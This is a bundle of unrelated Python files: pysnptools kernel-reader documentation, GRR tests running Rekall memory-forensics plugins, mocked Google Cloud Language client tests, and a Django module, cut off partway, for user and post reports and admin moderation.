>>> print2(kernel_on_disk.iid[:3]) # print the first three iids
[['per0' 'per0']
['per1' 'per1']
['per2' 'per2']]
>>> print(kernel_on_disk.iid_to_index([[b'per2',b'per2'],[b'per1',b'per1']])) #Find the indexes for two iids.
[2 1]
:class:`.KernelReader` is a kind of :class:`.PstReader`. See the documentation for :class:`.PstReader` to learn about:
* When Data is Read
* When Data is Re-Read and Copied
* Avoiding Unwanted ndarray Allocations
* Creating Subsetting PstReaders with Indexing
The :meth:`read` Method
By default the :meth:`read` returns a ndarray of scipy.float64 laid out in memory in F-contiguous order (iid0-index varies the fastest). You may, instead,
ask for scipy.float32 or for C-contiguous order or any order. See :meth:`read` for details.
The :meth:`.KernelData.standardize` Method
The :meth:`.KernelData.standardize` method, available only on :class:`.KernelData`, does in-place standardization of the in-memory
kernel data. The method multiples the values with a scalar factor such that the diagonal sums to iid_count. Although it works in place, for convenience
it also returns itself. See :meth:`.KernelData.standardize` for details.
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> kerneldata1 = kernel_on_disk.read() # read all kernel values into memory
>>> print(np.diag(kerneldata1.val).sum())
5000000.0
>>> kerneldata1.standardize() # standardize changes the values in kerneldata1.val
KernelData(KernelNpz('../examples/toydata.kernel.npz'))
>>> print(np.diag(kerneldata1.val).sum())
500.0
>>> kerneldata2 = kernel_on_disk.read().standardize() # Read and standardize in one expression with only one ndarray allocated.
>>> print(np.diag(kerneldata2.val).sum())
500.0
Details of Methods & Properties:
"""
def __init__(self, *args, **kwargs):
super(KernelReader, self).__init__(*args, **kwargs)
@property
def iid(self):
"""A ndarray of the iids. Each iid is a ndarray of two strings (a family ID and a case ID) that identifies an individual.
Assumes the kernel is square, so will throw an exception if the row iids are different from the column iids.
:rtype: ndarray (length :attr:`.iid_count`) of ndarray (length 2) of strings
This property (to the degree practical) reads only iid and sid data from the disk, not kernel value data. Moreover, the iid data is read from file only once.
:Example:
>>> from pysnptools.kernelreader import KernelNpz
>>> from pysnptools.util import print2 # Makes ascii strings look the same under Python2/Python3
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> print2(kernel_on_disk.iid[:3]) # print the first three iids
[['per0' 'per0']
['per1' 'per1']
['per2' 'per2']]
"""
assert self.iid0 is self.iid1, "When 'iid' is used, iid0 must be the same as iid1"
return self.iid0
@property
def iid0(self):
"""
A ndarray of the row iids. See :attr:`.iid`
"""
return self.row
@property
def iid1(self):
"""
A ndarray of the column iids. See :attr:`.iid`
"""
return self.col
@property
def iid_count(self):
"""number of iids
Assumes the kernel is square, so will throw an exception if the row iids are different from the column iids.
:rtype: integer
This property (to the degree practical) reads only iid data from the disk, not kernel value data. Moreover, the iid data is read from file only once.
"""
assert self.iid0 is self.iid1, "When 'iid_count' is used, iid0 must be the same as iid1"
return self.iid0_count
@property
def iid0_count(self):
"""number of row iids. See :attr:`iid_count`
:rtype: integer
"""
return self.row_count
@property
def iid1_count(self):
"""number of column iids. See :attr:`iid_count`
:rtype: integer
"""
return self.col_count
@property
def row_property(self):
"""
Defined for compatibility with :class:`.PstReader`. Will always be empty.
"""
if not hasattr(self,"_row_property"):
self._row_property = np.empty((self.row_count,0))
return self._row_property
@property
def col_property(self):
"""
Defined for compatibility with :class:`.PstReader`. Will always be empty.
"""
if not hasattr(self,"_col_property"):
self._col_property = np.empty((self.col_count,0))
return self._col_property
#!!check that views always return contiguous memory by default
def read(self, order='F', dtype=np.float64, force_python_only=False, view_ok=False):
"""Reads the kernel values and returns a :class:`.KernelData` (with :attr:`.KernelData.val` property containing a new ndarray of the kernel values).
:param order: {'F' (default), 'C', 'A'}, optional -- Specify the order of the ndarray. If order is 'F' (default),
then the array will be in F-contiguous order (iid0-index varies the fastest).
If order is 'C', then the returned array will be in C-contiguous order (iid1-index varies the fastest).
If order is 'A', then the :attr:`.KernelData.val`
ndarray may be in any order (either C-, Fortran-contiguous, or even discontiguous).
:type order: string or None
:param dtype: {scipy.float64 (default), scipy.float32}, optional -- The data-type for the :attr:`.KernelData.val` ndarray.
:type dtype: data-type
:param force_python_only: optional -- If False (default), may use outside library code. If True, requests that the read
be done without outside library code.
:type force_python_only: bool
:param view_ok: optional -- If False (default), allocates new memory for the :attr:`.KernelData.val`'s ndarray. If True,
if practical and reading from a :class:`KernelData`, will return a new
:class:`KernelData` with a ndarray shares memory with the original :class:`KernelData`.
Typically, you'll also wish to use "order='A'" to increase the chance that sharing will be possible.
Use these parameters with care because any change to either ndarray (for example, via :meth:`.KernelData.standardize`) will effect
the others. Also keep in mind that :meth:`read` relies on ndarray's mechanisms to decide whether to actually
share memory and so it may ignore your suggestion and allocate a new ndarray anyway.
:type view_ok: bool
:rtype: :class:`.KernelData`
Calling the method again causes the kernel values to be re-read and creates a new in-memory :class:`.KernelData` with a new ndarray of kernel values.
If you request the values for only a subset of the sids or iids, (to the degree practical) only that subset will be read from disk.
:Example:
>>> from pysnptools.kernelreader import KernelNpz
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> kerneldata1 = kernel_on_disk.read() # Read all the kernel data returning a KernelData instance
>>> print(type(kerneldata1.val).__name__) # The KernelData instance contains a ndarray of the data.
ndarray
>>> subset_kerneldata = kernel_on_disk[::2].read() # From the disk, read kernel values for every other iid
>>> print('{0:.6f}'.format(subset_kerneldata.val[0,0])) # Print the first kernel value in the subset
9923.069928
>>> subsub_kerneldata = subset_kerneldata[:10].read(order='A',view_ok=True) # Create an in-memory subset of the subset with kernel values for the first ten iids. Share memory if practical.
>>> import numpy as np
>>> #print(np.may_share_memory(subset_kerneldata.val, subsub_kerneldata.val)) # Do the two ndarray's share memory? They could. Currently they won't.
"""
val = self._read(None, None, order, dtype, force_python_only, view_ok)
from pysnptools.kernelreader import KernelData
ret = KernelData(iid0=self.iid0, iid1=self.iid1, val=val, name=str(self))
return ret
def iid_to_index(self, list):
"""Takes a list of iids and returns a list of index numbers.
Assumes the kernel is square, so will throw an exception if the row iids are different from the column iids.
:param list: list of iids
:type order: list of list of strings
:rtype: ndarray of int
This method (to the degree practical) reads only iid from the disk, not kernel value data. Moreover, the iid data is read from file only once.
:Example:
>>> from pysnptools.kernelreader import KernelNpz
>>> kernel_on_disk = KernelNpz('../examples/toydata.kernel.npz')
>>> print(kernel_on_disk.iid_to_index([[b'per2',b'per2'],[b'per1',b'per1']])) #Find the indexes for two iids.
[2 1]
"""
assert self.iid0 is self.iid1, "When 'iid_to_index' is used, iid0 must be the same as iid1"
return self.iid0_to_index(list)
def iid0_to_index(self, list):
"""Takes a list of row iids and returns a list of index numbers. See :attr:`iid_to_index`
"""
return self.row_to_index(list)
@staticmethod
def _makekey(item):
return tuple(i.encode('ascii') for i in item)
def iid1_to_index(self, list):
"""Takes a list of column iids and returns a list of index numbers. See :attr:`iid_to_index`
"""
return self.col_to_index(list)
def __getitem__(self, iid_indexer_and_snp_indexer):
from pysnptools.kernelreader._subset import _KernelSubset
if isinstance(iid_indexer_and_snp_indexer,tuple):
iid0_indexer, iid1_indexer = iid_indexer_and_snp_indexer
else:
iid0_indexer = iid_indexer_and_snp_indexer
iid1_indexer = iid0_indexer
return _KernelSubset(self, iid0_indexer, iid1_indexer)
def _assert_iid0_iid1(self):
assert self._row.dtype.type is np.string_ and len(self._row.shape)==2 and self._row.shape[1]==2, "iid0 should be dtype S, have two dimensions, and the second dimension should be size 2"
assert self._col.dtype.type is np.string_ and len(self._col.shape)==2 and self._col.shape[1]==2, "iid1 should be dtype S, have two dimensions, and the second dimension should be size 2"
def _read_with_standardizing(self, to_kerneldata, snp_standardizer=None, kernel_standardizer=DiagKtoN(), return_trained=False):
assert to_kerneldata, "When working with non-SnpKernels, to_kerneldata must be 'True'"
kernel, kernel_trained = self.read().standardize(kernel_standardizer,return_trained=True)
if return_trained:
return kernel, None, kernel_trained
else:
return kernel
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import doctest
doctest.testmod()
# There is also a unit test case in 'pysnptools\test.py' that calls this doc test
print("done")
| |
#!/usr/bin/env python
"""Tests for grr.client.client_actions.grr_rekall."""
import functools
import os
import logging
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import test_lib
# This test runs flows from these modules. pylint: disable=unused-import
from grr.lib.flows.general import memory
from grr.lib.flows.general import registry
from grr.lib.flows.general import transfer
# pylint: enable=unused-import
from grr.lib.rdfvalues import paths as rdf_paths
from grr.lib.rdfvalues import rekall_types as rdf_rekall_types
class RekallTestSuite(test_lib.EmptyActionTest):
"""A test suite for testing Rekall plugins.
Note that since the Rekall plugin is a SuspendableAction it is impossible to
test it in isolation from the AnalyzeClientMemory Flow. The flow is needed to
load profiles, and allow the client action to proceed. We therefore have flow
tests here instead of simply a client action test (Most other client actions
are very simple so it is possible to test them in isolation).
"""
def setUp(self):
super(RekallTestSuite, self).setUp()
self.client_id = self.SetupClients(1)[0]
def CreateClient(self):
client = aff4.FACTORY.Create(self.client_id,
"VFSGRRClient", token=self.token)
client.Set(client.Schema.ARCH("AMD64"))
client.Set(client.Schema.OS_RELEASE("7"))
client.Set(client.Schema.SYSTEM("Windows"))
client.Close()
def LaunchRekallPlugin(self, request):
"""Launch AnalyzeClientMemory flow and return its output as a string.
Args:
request: A RekallRequest() proto.
"""
# For this test we force the client to write the profile cache in the temp
# directory. This forces the profiles to always be downloaded from the
# server (since each test run gets a new temp directory).
with test_lib.ConfigOverrider({"Client.rekall_profile_cache_path":
self.temp_dir}):
image_path = os.path.join(self.base_path, "win7_trial_64bit.raw")
self.CreateClient()
self.CreateSignedDriver()
class ClientMock(action_mocks.MemoryClientMock):
"""A mock which returns the image as the driver path."""
def GetMemoryInformation(self, _):
"""Mock out the driver loading code to pass the memory image."""
reply = rdf_rekall_types.MemoryInformation(
device=rdf_paths.PathSpec(
path=image_path,
pathtype=rdf_paths.PathSpec.PathType.OS))
reply.runs.Append(offset=0, length=1000000000)
return [reply]
# Allow the real RekallAction to run against the image.
for _ in test_lib.TestFlowHelper(
"AnalyzeClientMemory",
ClientMock(
"RekallAction", "WriteRekallProfile", "DeleteGRRTempFiles"
),
token=self.token, client_id=self.client_id,
request=request, output="analysis/memory"):
pass
# Check that the profiles are also cached locally.
test_profile_dir = os.path.join(config_lib.CONFIG["Test.data_dir"],
"profiles")
self.assertEqual(
os.stat(os.path.join(self.temp_dir, "v1.0/pe.gz")).st_size,
os.stat(os.path.join(test_profile_dir, "v1.0/pe.gz")).st_size)
p_name = "v1.0/nt/GUID/F8E2A8B5C9B74BF4A6E4A48F180099942.gz"
self.assertEqual(
os.stat(os.path.join(self.temp_dir, p_name)).st_size,
os.stat(os.path.join(test_profile_dir, p_name)).st_size)
def RequireTestImage(f):
"""Decorator that skips tests if we don't have the memory image."""
@functools.wraps(f)
def Decorator(testinstance):
image_path = os.path.join(testinstance.base_path, "win7_trial_64bit.raw")
if os.access(image_path, os.R_OK):
return f(testinstance)
else:
return testinstance.skipTest("No win7_trial_64bit.raw memory image,"
"skipping test. Download it here: "
"goo.gl/19AJGl and put it in test_data.")
return Decorator
class RekallTests(RekallTestSuite):
"""Test some core Rekall modules."""
@RequireTestImage
def testRekallModules(self):
"""Tests the end to end Rekall memory analysis."""
request = rdf_rekall_types.RekallRequest()
request.plugins = [
# Only use these methods for listing processes.
rdf_rekall_types.PluginRequest(
plugin="pslist", args=dict(
method=["PsActiveProcessHead", "CSRSS"]
)),
rdf_rekall_types.PluginRequest(plugin="modules")]
self.LaunchRekallPlugin(request)
# Get the result collection - it should be a RekallResponseCollection.
fd = aff4.FACTORY.Open(self.client_id.Add("analysis/memory"),
token=self.token)
# Ensure that the client_id is set on each message. This helps us demux
# messages from different clients, when analyzing the collection from a
# hunt.
json_blobs = []
for x in fd:
self.assertEqual(x.client_urn, self.client_id)
json_blobs.append(x.json_messages)
json_blobs = "".join(json_blobs)
for knownresult in ["DumpIt.exe", "DumpIt.sys"]:
self.assertTrue(knownresult in json_blobs)
@RequireTestImage
def testFileOutput(self):
"""Tests that a file can be written by a plugin and retrieved."""
request = rdf_rekall_types.RekallRequest()
request.plugins = [
# Run procdump to create one file.
rdf_rekall_types.PluginRequest(
plugin="procdump", args=dict(pid=2860))]
with test_lib.Instrument(transfer.MultiGetFile,
"StoreStat") as storestat_instrument:
self.LaunchRekallPlugin(request)
# Expect one file to be downloaded.
self.assertEqual(storestat_instrument.call_count, 1)
@RequireTestImage
def testParameters(self):
request = rdf_rekall_types.RekallRequest()
request.plugins = [
# Only use these methods for listing processes.
rdf_rekall_types.PluginRequest(
plugin="pslist", args=dict(
pid=[4, 2860],
method="PsActiveProcessHead"
)),
]
self.LaunchRekallPlugin(request)
# Get the result collection - it should be a RekallResponseCollection.
fd = aff4.FACTORY.Open(self.client_id.Add("analysis/memory"),
token=self.token)
json_blobs = [x.json_messages for x in fd]
json_blobs = "".join(json_blobs)
for knownresult in ["System", "DumpIt.exe"]:
self.assertTrue(knownresult in json_blobs)
@RequireTestImage
def testDLLList(self):
"""Tests that we can run a simple DLLList Action."""
request = rdf_rekall_types.RekallRequest()
request.plugins = [
# Only use these methods for listing processes.
rdf_rekall_types.PluginRequest(
plugin="dlllist", args=dict(
proc_regex="dumpit",
method="PsActiveProcessHead"
)),
]
self.LaunchRekallPlugin(request)
# Get the result collection - it should be a RekallResponseCollection.
fd = aff4.FACTORY.Open(self.client_id.Add("analysis/memory"),
token=self.token)
json_blobs = [x.json_messages for x in fd]
json_blobs = "".join(json_blobs)
for knownresult in ["DumpIt", "wow64win", "wow64", "wow64cpu", "ntdll"]:
self.assertTrue(knownresult in json_blobs)
@RequireTestImage
def DisabledTestAllPlugins(self):
"""Tests that we can run a wide variety of plugins.
Some of those plugins are very expensive to run so this test is disabled by
default.
"""
plugins = [
"atoms", "atomscan", "build_index", "callbacks", "cc", "cert_vad_scan",
"certscan", "cmdscan", "consoles", "convert_profile", "desktops",
"devicetree", "dis", "dlldump", "dlllist", "driverirp", "driverscan",
"dt", "dtbscan", "dtbscan2", "dump", "dwarfparser", "eifconfig",
"enetstat", "eventhooks", "fetch_pdb", "filescan", "find_dtb", "gahti",
"getservicesids", "grep", "guess_guid", "handles", "hivedump", "hives",
"imagecopy", "imageinfo", "impscan", "info", "json_render", "kdbgscan",
"kpcr", "l", "ldrmodules", "load_as", "load_plugin", "malfind",
"memdump", "memmap", "messagehooks", "moddump", "modscan", "modules",
"mutantscan", "netscan", "netstat", "notebook", "null", "object_tree",
"object_types", "p", "parse_pdb", "pas2vas", "pedump", "peinfo", "pfn",
"phys_map", "pool_tracker", "pools", "printkey", "procdump", "procinfo",
"pslist", "psscan", "pstree", "psxview", "pte", "ptov", "raw2dmp",
"regdump", "rekal", "sessions", "ssdt", "svcscan", "symlinkscan",
"thrdscan", "threads", "timers", "tokens", "unloaded_modules",
"userassist", "userhandles", "users", "vad", "vaddump", "vadinfo",
"vadtree", "vadwalk", "version_modules", "version_scan", "vmscan",
"vtop", "windows_stations"]
output_urn = self.client_id.Add("analysis/memory")
failed_plugins = []
for plugin in plugins:
logging.info("Running plugin: %s", plugin)
try:
aff4.FACTORY.Delete(output_urn, token=self.token)
request = rdf_rekall_types.RekallRequest()
request.plugins = [
rdf_rekall_types.PluginRequest(plugin=plugin)
]
self.LaunchRekallPlugin(request)
# Get the result collection - it should be a RekallResponseCollection.
fd = aff4.FACTORY.Open(output_urn, token=self.token)
# Try to render the result.
fd.RenderAsText()
except Exception: # pylint: disable=broad-except
failed_plugins.append(plugin)
logging.error("Plugin %s failed.", plugin)
if failed_plugins:
self.fail("Some plugins failed: %s" % failed_plugins)
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
| |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import mock
import pytest
from google.cloud import language_v1beta2
from google.cloud.language_v1beta2.proto import language_service_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self, method, request_serializer=None, response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestLanguageServiceClient(object):
def test_analyze_sentiment(self):
# Setup Expected Response
language = "language-1613589672"
expected_response = {"language": language}
expected_response = language_service_pb2.AnalyzeSentimentResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup Request
document = {}
response = client.analyze_sentiment(document)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = language_service_pb2.AnalyzeSentimentRequest(
document=document
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_analyze_sentiment_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup request
document = {}
with pytest.raises(CustomException):
client.analyze_sentiment(document)
def test_analyze_entities(self):
# Setup Expected Response
language = "language-1613589672"
expected_response = {"language": language}
expected_response = language_service_pb2.AnalyzeEntitiesResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup Request
document = {}
response = client.analyze_entities(document)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = language_service_pb2.AnalyzeEntitiesRequest(
document=document
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_analyze_entities_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup request
document = {}
with pytest.raises(CustomException):
client.analyze_entities(document)
def test_analyze_entity_sentiment(self):
# Setup Expected Response
language = "language-1613589672"
expected_response = {"language": language}
expected_response = language_service_pb2.AnalyzeEntitySentimentResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup Request
document = {}
response = client.analyze_entity_sentiment(document)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = language_service_pb2.AnalyzeEntitySentimentRequest(
document=document
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_analyze_entity_sentiment_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup request
document = {}
with pytest.raises(CustomException):
client.analyze_entity_sentiment(document)
def test_analyze_syntax(self):
# Setup Expected Response
language = "language-1613589672"
expected_response = {"language": language}
expected_response = language_service_pb2.AnalyzeSyntaxResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup Request
document = {}
response = client.analyze_syntax(document)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = language_service_pb2.AnalyzeSyntaxRequest(document=document)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_analyze_syntax_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup request
document = {}
with pytest.raises(CustomException):
client.analyze_syntax(document)
def test_classify_text(self):
# Setup Expected Response
expected_response = {}
expected_response = language_service_pb2.ClassifyTextResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup Request
document = {}
response = client.classify_text(document)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = language_service_pb2.ClassifyTextRequest(document=document)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_classify_text_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup request
document = {}
with pytest.raises(CustomException):
client.classify_text(document)
def test_annotate_text(self):
# Setup Expected Response
language = "language-1613589672"
expected_response = {"language": language}
expected_response = language_service_pb2.AnnotateTextResponse(
**expected_response
)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup Request
document = {}
features = {}
response = client.annotate_text(document, features)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = language_service_pb2.AnnotateTextRequest(
document=document, features=features
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_annotate_text_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = language_v1beta2.LanguageServiceClient()
# Setup request
document = {}
features = {}
with pytest.raises(CustomException):
client.annotate_text(document, features)
| |
from filecmp import demo
from django.conf.app_template import admin
from django.contrib.auth.decorators import login_required
from django.contrib.messages.views import SuccessMessageMixin
from django.shortcuts import render
from django.utils.datetime_safe import datetime
from django.utils.decorators import method_decorator
from django.views.generic import ListView
from django.http import HttpResponseRedirect, JsonResponse
from buzzit_messaging.views import __send_system__message__
from buzzit_models.models import *
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse, reverse_lazy
import django.contrib.messages as messages
from django.views.generic import ListView, DetailView
from buzzit_models.models import *
from django.contrib.auth.decorators import login_required
import json
from django.core.mail import send_mail
@login_required
def report_user(request, user_id):
"""
current user report other user, and gives the reason which should not be empty
:param request:
:param user_id:
:return:
"""
if request.method == "POST":
try:
reported_user = User.objects.get(pk=user_id)
except ObjectDoesNotExist:
messages.error(request, "Der Benutzer existiert nicht.")
return HttpResponseRedirect(reverse_lazy("home"))
if request.method == "POST":
report_message = UserReport()
report_text = request.POST.get("text", False)
try:
if report_text:
report_message.text = report_text
except ObjectDoesNotExist:
messages.error(request, "Fehler")
if len(report_message.text) < 1:
messages.error(request, "Text zum Benutzermelden ist zu geben")
return HttpResponseRedirect(reverse_lazy("home"))
report_message.creator = request.user
report_message.created = datetime.now()
report_message.reported_user = reported_user
report_message.save()
messages.info(request, "Sie haben den <User:%s> Benutzer gemeldet" % reported_user)
return HttpResponseRedirect(reverse_lazy('home'))
else:
try:
reported_profile = Profile.objects.get(pk=user_id)
except ObjectDoesNotExist:
messages.error(request, "Der Benutzer existiert nicht.")
return HttpResponseRedirect(reverse_lazy("home"))
return render(request, "logged_in/report_user.html", {"profile": reported_profile})
class UserReportDetailsView(SuccessMessageMixin, ListView):
"""
display the report text and reported user
"""
model = UserReport
template_name = "logged_in/user_report_details.html"
def get_queryset(self):
report_id = self.kwargs.get("report_id")
try:
return UserReport.objects.filter(pk=report_id).order_by("created")
except ObjectDoesNotExist:
messages.error(self.request, "Benutzer existiert nicht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
def get_context_data(self, **kwargs):
context = super(UserReportDetailsView, self).get_context_data(**kwargs)
report_id = self.kwargs.get("report_id")
try:
report = UserReport.objects.get(pk=report_id)
except ObjectDoesNotExist:
messages.error(self.request, "Benutzer existiert nicht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
reported_user_profile = report.reported_user.profile
context["profile"] = reported_user_profile
context["userreport"] = report
return context
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(UserReportDetailsView, self).dispatch(request, args, kwargs)
class AdminFrontpageView():
pass
@login_required
def adminFrontPage(request):
"""
show all userreports and
postreports
:param request:
:return:
"""
if request.user.is_superuser:
userreports = UserReport.objects.filter(closed=False).all()
postreports = CircleMessageReport.objects.filter(closed=False).all()
return render(request, "logged_in/admin_dashboard.html",
{"user_reports": userreports, "post_reports": postreports})
else:
messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
class MessageReportDetailsView(DetailView):
model = CircleMessageReport
slug_field = "id"
template_name = "logged_in/post_report_details.html"
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(MessageReportDetailsView, self).dispatch(request, args, kwargs)
@login_required
def AdminOverviewView(request):
if request.user.is_superuser:
adminlist = []
adminlist = User.objects.filter(is_superuser=True)
return render(request, "logged_in/admin_list.html", {"userlist": adminlist})
else:
messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
@login_required
def delete_reported_post(request, report_id):
"""
delete reported message from admin, check if the message has answers,
reported message with all answers would be delete, else delete only message
TODO was ist, wenn eine Nachricht rebuzzed wurde
:param request:
:param message_id:
:return:
"""
try:
report = CircleMessageReport.objects.get(pk=report_id)
except ObjectDoesNotExist:
messages.error(request, "Der Report existiert nicht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
# if the reported post has anwsers, delete all
if not (request.user.is_superuser):
messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
post_to_del = report.reported_message
answers = Circle_message.objects.filter(answer_to=post_to_del)
answers.delete()
post_to_del.delete()
report.issuer = request.user
report.valid = True
report.closed = True
messages.success(request, "Die Nachrichte wurde erfolgreich geloescht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
@login_required
def promote_user_to_admin(request, user_id):
"""
check if user exists, then check if user is active
:param request:
:param user_id:
:return:
"""
try:
admin_user = User.objects.get(pk=user_id)
except ObjectDoesNotExist:
messages.error(request, "Der Benuzer existiert nicht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
if not (request.user.is_superuser):
messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
if not (admin_user.is_active):
messages.info(request, "Der Benutzer ist deaktiviert")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
admin_user.is_superuser = True
admin_user.save()
messages.info(request, "Der Benutzer %s ist als AdminUser hinzugefuegt" % (admin_user.username,))
return HttpResponseRedirect(reverse_lazy("admins_overview"))
@login_required
def demote_admin_to_user(request, user_id):
"""
check if user exists, check if user is adminUser
:param request:
:param user_id:
:return:
"""
try:
demote_user = User.objects.get(pk=user_id)
except ObjectDoesNotExist:
messages.error(request, "Der Benutzer existiert nicht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
if not (request.user.is_superuser):
messages.error(request, "Sie haben nicht die noetigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
if not (demote_user.is_superuser):
messages.error(request, "Der Benutzer ist kein Admin ")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
demote_user.is_superuser = False
demote_user.save()
messages.info(request, "Die Adminrechte von dem Benutzer wird entziehen")
return HttpResponseRedirect(reverse_lazy("admins_overview"))
@login_required
def report_message(request, message_id):
"""
Report a circlemessage with given <message_id>, if that exists.
If that does not exist, then an error for the user is returned and he gets redirected to home.
If that message exists,
then the report will be created, if an reason (report.text) was given.
The report is saved then.
if there is no reason, an error will be created and the user is redirected to home.
:param request:
:param message_id:
:return:
"""
try:
reported_message = Circle_message.objects.get(pk=message_id)
except Exception:
messages.error(request, "Die Nachricht existiert nicht")
return HttpResponseRedirect(reverse("home"))
if request.method == "POST":
report = CircleMessageReport()
report.reported_message = reported_message
report.text = request.POST.get("text", False)
if not report.text or len(report.text) < 1:
messages.error(request, "Keine Begruendung angegeben")
return HttpResponseRedirect(reverse("home"))
report.creator = request.user
report.created = datetime.now()
report.save()
messages.success(request, "Nachricht wurde gemeldet")
return HttpResponseRedirect(reverse("home"))
reported_profile = Profile.objects.get(pk=reported_message.creator.pk)
return render(request, "logged_in/report_post.html",
{"profile": reported_profile, "circlemessage": reported_message})
@login_required
def ban_user(request, user_id):
"""
set ban user and send email to him with reason,TODO provides ban user information to contact with admin user
:param request:
:param user_id:
:return:
"""
try:
user_to_be_ban = User.objects.get(pk=user_id)
except ObjectDoesNotExist:
messages.error(request, "Der Benutzer existiert nicht")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
if not (request.user.is_superuser):
messages.error(request, "Sie haben nicht die ntigen Zugangsrechte!")
return HttpResponseRedirect(reverse("home"))
if not (user_to_be_ban.is_active):
messages.info(request, "Der Benutzer ist bereits deaktiviert")
return HttpResponseRedirect(reverse_lazy("admin_frontpage"))
message_for_ban = request.GET.get("text", False)
user_to_be_ban.is_active = False
user_to_be_ban.save()
